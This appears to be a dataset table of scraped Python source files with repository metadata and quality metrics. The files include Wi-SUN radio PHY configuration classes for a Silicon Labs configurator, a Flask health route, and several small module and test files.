hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3b7101134f1e50087e5e45ab33f4482509251953 | 94 | py | Python | components/sale/Sale_tpl.py | bitbuit/billterm | 553bf2afb6ff2c1e15becbe1b4ab59346e5a87b5 | [
"MIT"
] | null | null | null | components/sale/Sale_tpl.py | bitbuit/billterm | 553bf2afb6ff2c1e15becbe1b4ab59346e5a87b5 | [
"MIT"
] | null | null | null | components/sale/Sale_tpl.py | bitbuit/billterm | 553bf2afb6ff2c1e15becbe1b4ab59346e5a87b5 | [
"MIT"
] | null | null | null | from components.invoice.Invoice_tpl import Invoice_tpl
class Sale_tpl(Invoice_tpl):
pass
| 18.8 | 54 | 0.819149 | 14 | 94 | 5.214286 | 0.571429 | 0.410959 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.12766 | 94 | 4 | 55 | 23.5 | 0.890244 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 6 |
3b8e5ab796ed8e6dfdf3966ec3affb1f849b44c0 | 39 | py | Python | src/tracking_turtlebot/__init__.py | Christophe-Foyer/tracking_turtlebot | a99208be66ef16e1002867d786464e060b15f621 | [
"MIT"
] | null | null | null | src/tracking_turtlebot/__init__.py | Christophe-Foyer/tracking_turtlebot | a99208be66ef16e1002867d786464e060b15f621 | [
"MIT"
] | null | null | null | src/tracking_turtlebot/__init__.py | Christophe-Foyer/tracking_turtlebot | a99208be66ef16e1002867d786464e060b15f621 | [
"MIT"
] | null | null | null | from tracking_turtlebot.utils import *
| 19.5 | 38 | 0.846154 | 5 | 39 | 6.4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.102564 | 39 | 1 | 39 | 39 | 0.914286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8e7ef002622960284f14f9e6390d30ec6c258c9c | 27 | py | Python | lib/ext/__init__.py | SignusFalcon/CpE-Bot | 4e5a2be95043b09befd4008518a3072552e32a52 | [
"MIT"
] | null | null | null | lib/ext/__init__.py | SignusFalcon/CpE-Bot | 4e5a2be95043b09befd4008518a3072552e32a52 | [
"MIT"
] | null | null | null | lib/ext/__init__.py | SignusFalcon/CpE-Bot | 4e5a2be95043b09befd4008518a3072552e32a52 | [
"MIT"
] | null | null | null | from . import rootExtractor | 27 | 27 | 0.851852 | 3 | 27 | 7.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 27 | 1 | 27 | 27 | 0.958333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8ec86f874e1cc424c4d86d09f70f0c20717e7018 | 26 | py | Python | simple.py | PowerSnail/cs3240-labdemo-hj5fb | 6ee122cd34d06e617c081f736e9de9397e84733b | [
"MIT"
] | null | null | null | simple.py | PowerSnail/cs3240-labdemo-hj5fb | 6ee122cd34d06e617c081f736e9de9397e84733b | [
"MIT"
] | null | null | null | simple.py | PowerSnail/cs3240-labdemo-hj5fb | 6ee122cd34d06e617c081f736e9de9397e84733b | [
"MIT"
] | null | null | null | print("something simple")
| 13 | 25 | 0.769231 | 3 | 26 | 6.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.076923 | 26 | 1 | 26 | 26 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0.615385 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
8ed9a279b95b5b9620472ea0e85892adba2583c3 | 14,258 | py | Python | platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/sol/phys/Phys_Studio_WiSUN_FSK.py | lmnotran/gecko_sdk | 2e82050dc8823c9fe0e8908c1b2666fb83056230 | [
"Zlib"
] | 82 | 2016-06-29T17:24:43.000Z | 2021-04-16T06:49:17.000Z | platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/sol/phys/Phys_Studio_WiSUN_FSK.py | lmnotran/gecko_sdk | 2e82050dc8823c9fe0e8908c1b2666fb83056230 | [
"Zlib"
] | 2 | 2017-02-13T10:07:17.000Z | 2017-03-22T21:28:26.000Z | platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/sol/phys/Phys_Studio_WiSUN_FSK.py | lmnotran/gecko_sdk | 2e82050dc8823c9fe0e8908c1b2666fb83056230 | [
"Zlib"
] | 56 | 2016-08-02T10:50:50.000Z | 2021-07-19T08:57:34.000Z | from pyradioconfig.parts.ocelot.phys.Phys_Studio_WiSUN import PHYS_IEEE802154_WiSUN_Ocelot
from pyradioconfig.calculator_model_framework.decorators.phy_decorators import do_not_inherit_phys
@do_not_inherit_phys
class PHYS_IEEE802154_WiSUN_FSK_Sol(PHYS_IEEE802154_WiSUN_Ocelot):
# Owner: Casey Weltzin
# Jira Link: https://jira.silabs.com/browse/PGSOLVALTEST-30
def PHY_IEEE802154_WISUN_868MHz_2GFSK_50kbps_1a_EU(self, model, phy_name=None):
phy = self._makePhy(model, model.profiles.WiSUN_FSK, readable_name='Wi-SUN FAN, EU-868MHz, 1a (2FSK 50kbps mi=0.5)',
phy_name=phy_name)
### Frequency Band and Channel Parameters ###
# PhyModeID: 1/17 (FEC off/on)
# ChanPlanID: 32 (863_870_100, 100kHz spacing, Ch0 863.1MHz)
# Select the correct SUNFSK mode
phy.profile_inputs.wisun_mode.value = model.vars.wisun_mode.var_enum.Mode1a
# Define WiSUN Profile / Region specific inputs
phy.profile_inputs.base_frequency_hz.value = 863100000
phy.profile_inputs.channel_spacing_hz.value = 100000
phy.profile_inputs.preamble_length.value = 8 * 8
phy.profile_inputs.fcs_type_802154.value = model.vars.fcs_type_802154.var_enum.FOUR_BYTE
# Default xtal frequency of 39MHz
phy.profile_inputs.xtal_frequency_hz.value = 39000000
return phy
# Owner: Casey Weltzin
# Jira Link: https://jira.silabs.com/browse/PGSOLVALTEST-31
def PHY_IEEE802154_WISUN_915MHz_2GFSK_50kbps_1b_NA(self, model, phy_name=None):
phy = self._makePhy(model, model.profiles.WiSUN_FSK, readable_name='Wi-SUN FAN, NA-915MHz, 1b (2FSK 50kbps mi=1.0)',
phy_name=phy_name)
### Frequency Band and Channel Parameters ###
# PhyModeID: 2/18 (FEC off/on)
# ChanPlanID: 1 (902_928_200, 200kHz spacing, Ch0 902.2MHz)
# Select the correct SUNFSK mode
phy.profile_inputs.wisun_mode.value = model.vars.wisun_mode.var_enum.Mode1b
# Define WiSUN Profile / Region specific inputs
phy.profile_inputs.base_frequency_hz.value = 902200000
phy.profile_inputs.channel_spacing_hz.value = 200000
phy.profile_inputs.preamble_length.value = 8 * 8
phy.profile_inputs.fcs_type_802154.value = model.vars.fcs_type_802154.var_enum.FOUR_BYTE
# Default xtal frequency of 39MHz
phy.profile_inputs.xtal_frequency_hz.value = 39000000
return phy
# Owner: Casey Weltzin
# Jira Link: https://jira.silabs.com/browse/PGSOLVALTEST-32
def PHY_IEEE802154_WISUN_920MHz_2GFSK_50kbps_1b_JP_ECHONET(self, model, phy_name=None):
phy = self._makePhy(model, model.profiles.WiSUN_FSK,
readable_name='Wi-SUN ECHONET, JP-920MHz, 1b (2FSK 50kbps mi=1.0)', phy_name=phy_name)
### Frequency Band and Channel Parameters ###
# PhyModeID: 2/18 (FEC off/on)
# ChanPlanID: 21 (920_928_200, 200kHz spacing, Ch0 920.6MHz)
# Select the correct SUNFSK mode
phy.profile_inputs.wisun_mode.value = model.vars.wisun_mode.var_enum.Mode1b
# Define WiSUN Profile / Region specific inputs
phy.profile_inputs.base_frequency_hz.value = 920600000
phy.profile_inputs.channel_spacing_hz.value = 200000
phy.profile_inputs.preamble_length.value = 8 * 8
phy.profile_inputs.fcs_type_802154.value = model.vars.fcs_type_802154.var_enum.TWO_BYTE
# Default xtal frequency of 39MHz
phy.profile_inputs.xtal_frequency_hz.value = 39000000
return phy
# Owner: Casey Weltzin
# Jira Link: https://jira.silabs.com/browse/PGSOLVALTEST-33
def PHY_IEEE802154_WISUN_470MHz_2GFSK_50kbps_1b_CN(self, model, phy_name=None):
phy = self._makePhy(model, model.profiles.WiSUN_FSK, readable_name='Wi-SUN FAN, CN-470MHz, 1b (2FSK 50kbps mi=1.0)',
phy_name=phy_name)
### Frequency Band and Channel Parameters ###
# PhyModeID: 2/18 (FEC off/on)
# ChanPlanID: TBD
# Select the correct SUNFSK mode
phy.profile_inputs.wisun_mode.value = model.vars.wisun_mode.var_enum.Mode1b
# Define WiSUN Profile / Region specific inputs
phy.profile_inputs.base_frequency_hz.value = 470200000
phy.profile_inputs.channel_spacing_hz.value = 200000
phy.profile_inputs.preamble_length.value = 8 * 8
phy.profile_inputs.fcs_type_802154.value = model.vars.fcs_type_802154.var_enum.FOUR_BYTE
# Default xtal frequency of 39MHz
phy.profile_inputs.xtal_frequency_hz.value = 39000000
return phy
# Owner: Casey Weltzin
# Jira Link: https://jira.silabs.com/browse/PGSOLVALTEST-34
def PHY_IEEE802154_WISUN_868MHz_2GFSK_100kbps_2a_EU(self, model, phy_name=None):
phy = self._makePhy(model, model.profiles.WiSUN_FSK,
readable_name='Wi-SUN FAN, EU-868MHz, 2a (2FSK 100kbps mi=0.5)', phy_name=phy_name)
### Frequency Band and Channel Parameters ###
# PhyModeID: 3/19 (FEC off/on)
# ChanPlanID: 33 (863_870_200, 200kHz spacing, Ch0 863.1MHz)
# Select the correct SUNFSK mode
phy.profile_inputs.wisun_mode.value = model.vars.wisun_mode.var_enum.Mode2a
# Define WiSUN Profile / Region specific inputs
phy.profile_inputs.base_frequency_hz.value = 863100000
phy.profile_inputs.channel_spacing_hz.value = 200000
phy.profile_inputs.preamble_length.value = 8 * 8
phy.profile_inputs.fcs_type_802154.value = model.vars.fcs_type_802154.var_enum.FOUR_BYTE
# Default xtal frequency of 39MHz
phy.profile_inputs.xtal_frequency_hz.value = 39000000
return phy
# Owner: Casey Weltzin
# Jira Link: https://jira.silabs.com/browse/PGSOLVALTEST-35
def PHY_IEEE802154_WISUN_470MHz_2GFSK_100kbps_2a_CN(self, model, phy_name=None):
phy = self._makePhy(model, model.profiles.WiSUN_FSK,
readable_name='Wi-SUN FAN, CN-470MHz, 2a (2FSK 100kbps mi=0.5)', phy_name=phy_name)
### Frequency Band and Channel Parameters ###
# PhyModeID: 3/19 (FEC off/on)
# ChanPlanID: TBD
# Select the correct SUNFSK mode
phy.profile_inputs.wisun_mode.value = model.vars.wisun_mode.var_enum.Mode2a
# Define WiSUN Profile / Region specific inputs
phy.profile_inputs.base_frequency_hz.value = 470200000
phy.profile_inputs.channel_spacing_hz.value = 200000
phy.profile_inputs.preamble_length.value = 8 * 8
phy.profile_inputs.fcs_type_802154.value = model.vars.fcs_type_802154.var_enum.FOUR_BYTE
# Default xtal frequency of 39MHz
phy.profile_inputs.xtal_frequency_hz.value = 39000000
return phy
# Owner: Casey Weltzin
# Jira Link: https://jira.silabs.com/browse/PGSOLVALTEST-36
def PHY_IEEE802154_WISUN_920MHz_2GFSK_100kbps_2b_JP_ECHONET(self, model, phy_name=None):
phy = self._makePhy(model, model.profiles.WiSUN_FSK,
readable_name='Wi-SUN ECHONET, JP-920MHz, 2b (2FSK 100kbps mi=1.0)', phy_name=phy_name)
### Frequency Band and Channel Parameters ###
# PhyModeID: 4/20 (FEC off/on)
# ChanPlanID: 22 (920_928_400, 400kHz spacing, Ch0 920.9MHz)
# Select the correct SUNFSK mode
phy.profile_inputs.wisun_mode.value = model.vars.wisun_mode.var_enum.Mode2b
# Define WiSUN Profile / Region specific inputs
phy.profile_inputs.base_frequency_hz.value = 920900000
phy.profile_inputs.channel_spacing_hz.value = 400000
phy.profile_inputs.preamble_length.value = 15 * 8
phy.profile_inputs.fcs_type_802154.value = model.vars.fcs_type_802154.var_enum.TWO_BYTE
# Default xtal frequency of 39MHz
phy.profile_inputs.xtal_frequency_hz.value = 39000000
return phy
def PHY_IEEE802154_WISUN_920MHz_2GFSK_100kbps_2b_JP(self, model, phy_name=None):
phy = self._makePhy(model, model.profiles.WiSUN_FSK, readable_name='Wi-SUN FAN, JP-920MHz, 2b (2FSK 100kbps mi=1.0)', phy_name=phy_name)
### Frequency Band and Channel Parameters ###
# PhyModeID: 4/20 (FEC off/on)
# ChanPlanID: 22 (920_928_400, 400kHz spacing, Ch0 920.9MHz)
# Select the correct SUNFSK mode
phy.profile_inputs.wisun_mode.value = model.vars.wisun_mode.var_enum.Mode2b
# Define WiSUN Profile / Region specific inputs
phy.profile_inputs.base_frequency_hz.value = 920900000
phy.profile_inputs.channel_spacing_hz.value = 400000
phy.profile_inputs.preamble_length.value = 8 * 8
phy.profile_inputs.fcs_type_802154.value = model.vars.fcs_type_802154.var_enum.FOUR_BYTE
# Default xtal frequency of 39MHz
phy.profile_inputs.xtal_frequency_hz.value = 39000000
return phy
# Owner: Casey Weltzin
# Jira Link: https://jira.silabs.com/browse/PGSOLVALTEST-37
def PHY_IEEE802154_WISUN_915MHz_2GFSK_150kbps_3_NA(self, model, phy_name=None):
phy = self._makePhy(model, model.profiles.WiSUN_FSK, readable_name='Wi-SUN FAN, NA-915MHz, 3 (2FSK 150kbps mi=0.5)',
phy_name=phy_name)
### Frequency Band and Channel Parameters ###
# PhyModeID: 5/21 (FEC off/on)
# ChanPlanID: 2 (902_928_400, 400kHz spacing, Ch0 902.4MHz)
# Select the correct SUNFSK mode
phy.profile_inputs.wisun_mode.value = model.vars.wisun_mode.var_enum.Mode3
# Define WiSUN Profile / Region specific inputs
phy.profile_inputs.base_frequency_hz.value = 902400000
phy.profile_inputs.channel_spacing_hz.value = 400000
phy.profile_inputs.preamble_length.value = 12 * 8
phy.profile_inputs.fcs_type_802154.value = model.vars.fcs_type_802154.var_enum.FOUR_BYTE
# Default xtal frequency of 39MHz
phy.profile_inputs.xtal_frequency_hz.value = 39000000
return phy
# Owner: Casey Weltzin
# Jira Link: https://jira.silabs.com/browse/PGSOLVALTEST-85
def PHY_IEEE802154_WISUN_868MHz_2GFSK_150kbps_3_EU(self, model, phy_name=None):
phy = self._makePhy(model, model.profiles.WiSUN_FSK, readable_name='Wi-SUN FAN, EU-868MHz, 3 (2FSK 150kbps mi=0.5)', phy_name=phy_name)
### Frequency Band and Channel Parameters ###
# PhyModeID: 5/21 (FEC off/on)
# ChanPlanID: 33 (863_870_200, 200kHz spacing, Ch0 863.1MHz)
# Select the correct SUNFSK mode
phy.profile_inputs.wisun_mode.value = model.vars.wisun_mode.var_enum.Mode3
# Define WiSUN Profile / Region specific inputs
phy.profile_inputs.base_frequency_hz.value = 863100000
phy.profile_inputs.channel_spacing_hz.value = 200000
phy.profile_inputs.preamble_length.value = 12 * 8
phy.profile_inputs.fcs_type_802154.value = model.vars.fcs_type_802154.var_enum.FOUR_BYTE
# Default xtal frequency of 39MHz
phy.profile_inputs.xtal_frequency_hz.value = 39000000
return phy
# Owner: Casey Weltzin
# Jira Link: https://jira.silabs.com/browse/PGSOLVALTEST-38
def PHY_IEEE802154_WISUN_915MHz_2GFSK_200kbps_4a_NA(self, model, phy_name=None):
phy = self._makePhy(model, model.profiles.WiSUN_FSK, readable_name='Wi-SUN FAN, NA-915MHz, 4a (2GFSK 200kbps mi=0.5)', phy_name=phy_name)
### Frequency Band and Channel Parameters ###
# PhyModeID: 6/22 (FEC off/on)
# ChanPlanID: 2 (902_928_400, 400kHz spacing, Ch0 902.4MHz)
# Select the correct SUNFSK mode
phy.profile_inputs.wisun_mode.value = model.vars.wisun_mode.var_enum.Mode4a
# Define WiSUN Profile / Region specific inputs
phy.profile_inputs.base_frequency_hz.value = 902400000
phy.profile_inputs.channel_spacing_hz.value = 400000
phy.profile_inputs.preamble_length.value = 12 * 8
phy.profile_inputs.fcs_type_802154.value = model.vars.fcs_type_802154.var_enum.FOUR_BYTE
# Default xtal frequency of 39MHz
phy.profile_inputs.xtal_frequency_hz.value = 39000000
return phy
# Owner: Casey Weltzin
# Jira Link: https://jira.silabs.com/browse/PGSOLVALTEST-39
def PHY_IEEE802154_WISUN_920MHz_2GFSK_200kbps_4b_JP(self, model, phy_name=None):
phy = self._makePhy(model, model.profiles.WiSUN_FSK, readable_name='Wi-SUN FAN, JP-920MHz, 4b (2GFSK 200kbps mi=1.0)', phy_name=phy_name)
### Frequency Band and Channel Parameters ###
# PhyModeID: 7/23 (FEC off/on)
# ChanPlanID: 23 (920_928_600, 600kHz spacing, Ch0 920.8MHz)
# Select the correct SUNFSK mode
phy.profile_inputs.wisun_mode.value = model.vars.wisun_mode.var_enum.Mode4b
# Define WiSUN Profile / Region specific inputs
phy.profile_inputs.base_frequency_hz.value = 920800000
phy.profile_inputs.channel_spacing_hz.value = 600000
phy.profile_inputs.preamble_length.value = 12 * 8
phy.profile_inputs.fcs_type_802154.value = model.vars.fcs_type_802154.var_enum.FOUR_BYTE
# Default xtal frequency of 39MHz
phy.profile_inputs.xtal_frequency_hz.value = 39000000
return phy
# Owner: Casey Weltzin
# Jira Link: https://jira.silabs.com/browse/PGSOLVALTEST-40
def PHY_IEEE802154_WISUN_915MHz_2GFSK_300kbps_5_NA(self, model, phy_name=None):
phy = self._makePhy(model, model.profiles.WiSUN_FSK, readable_name='Wi-SUN FAN, NA-915MHz, 5 (2GFSK 300kbps mi=0.5)', phy_name=phy_name)
### Frequency Band and Channel Parameters ###
# PhyModeID: 8/24 (FEC off/on)
# ChanPlanID: 3 (902_928_600, 600kHz spacing, Ch0 902.6MHz)
# Select the correct SUNFSK mode
phy.profile_inputs.wisun_mode.value = model.vars.wisun_mode.var_enum.Mode5
# Define WiSUN Profile / Region specific inputs
phy.profile_inputs.base_frequency_hz.value = 902600000
phy.profile_inputs.channel_spacing_hz.value = 600000
phy.profile_inputs.preamble_length.value = 24 * 8
phy.profile_inputs.fcs_type_802154.value = model.vars.fcs_type_802154.var_enum.FOUR_BYTE
# Default xtal frequency of 39MHz
phy.profile_inputs.xtal_frequency_hz.value = 39000000
return phy | 45.993548 | 145 | 0.702553 | 1,977 | 14,258 | 4.813859 | 0.089024 | 0.081959 | 0.131134 | 0.028686 | 0.937585 | 0.928339 | 0.891352 | 0.891352 | 0.891352 | 0.882736 | 0 | 0.099279 | 0.211601 | 14,258 | 310 | 146 | 45.993548 | 0.747353 | 0.275284 | 0 | 0.682171 | 0 | 0 | 0.060496 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.100775 | false | 0 | 0.015504 | 0 | 0.224806 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d90b0a6acd9956ff4ada52dd5e776c6ba2f32d25 | 263 | py | Python | tests/test_my_addition_function.py | pvcraven/pypi_package_example | a3189e5b1ef9033b376a8edaef387b71004eaf5e | [
"MIT"
] | 1 | 2019-11-08T15:00:10.000Z | 2019-11-08T15:00:10.000Z | tests/test_my_addition_function.py | pvcraven/pypi_package_example | a3189e5b1ef9033b376a8edaef387b71004eaf5e | [
"MIT"
] | null | null | null | tests/test_my_addition_function.py | pvcraven/pypi_package_example | a3189e5b1ef9033b376a8edaef387b71004eaf5e | [
"MIT"
] | null | null | null | import pypi_package_example
def test_my_addition_function():
assert pypi_package_example.my_addition_function(5, 10) == 15
assert pypi_package_example.my_addition_function(15, 10) == 25
assert pypi_package_example.my_addition_function(-10, 10) == 0
| 32.875 | 66 | 0.790875 | 39 | 263 | 4.897436 | 0.384615 | 0.230366 | 0.376963 | 0.376963 | 0.659686 | 0.659686 | 0.659686 | 0 | 0 | 0 | 0 | 0.069565 | 0.125475 | 263 | 7 | 67 | 37.571429 | 0.76087 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.6 | 1 | 0.2 | true | 0 | 0.2 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d93db4e8f9199d5396ce0faae843d4ca436faeea | 94 | py | Python | flaskspawn/cookiecutters/small/{{cookiecutter.repo_name}}/application/views.py | Skablam/flask-spawn | f68efc592952e3b68a11499e2be7d2161105d0b3 | [
"MIT"
] | 6 | 2015-07-05T09:52:27.000Z | 2017-11-05T02:34:32.000Z | flaskspawn/cookiecutters/small/{{cookiecutter.repo_name}}/application/views.py | Skablam/flask-spawn | f68efc592952e3b68a11499e2be7d2161105d0b3 | [
"MIT"
] | 2 | 2015-07-06T12:20:12.000Z | 2016-05-29T23:11:56.000Z | flaskspawn/cookiecutters/small/{{cookiecutter.repo_name}}/application/views.py | Skablam/flask-spawn | f68efc592952e3b68a11499e2be7d2161105d0b3 | [
"MIT"
] | 1 | 2017-02-18T21:32:38.000Z | 2017-02-18T21:32:38.000Z | from application import app
@app.route("/health")
def check_status():
return "Status OK"
| 15.666667 | 27 | 0.712766 | 13 | 94 | 5.076923 | 0.846154 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.159574 | 94 | 5 | 28 | 18.8 | 0.835443 | 0 | 0 | 0 | 0 | 0 | 0.170213 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.25 | 0.25 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
d943fcc37ca14cc2c4b8e922664a98abb7774583 | 170 | py | Python | scanpkg/__init__.py | mstg/scanpkg | ba1787f7bf5e3ef06415c9aef949bf20b552ae66 | [
"MIT"
] | 8 | 2015-07-31T17:44:36.000Z | 2020-01-14T16:40:43.000Z | scanpkg/__init__.py | mstg/scanpkg | ba1787f7bf5e3ef06415c9aef949bf20b552ae66 | [
"MIT"
] | 1 | 2019-09-20T19:21:53.000Z | 2019-09-20T19:21:53.000Z | scanpkg/__init__.py | mstg/scanpkg | ba1787f7bf5e3ef06415c9aef949bf20b552ae66 | [
"MIT"
] | 6 | 2017-01-13T15:39:56.000Z | 2020-05-26T18:35:23.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: Mustafa
# @Date: 2015-07-10 00:44:06
# @Last Modified by: Mustafa
# @Last Modified time: 2015-07-10 00:44:06
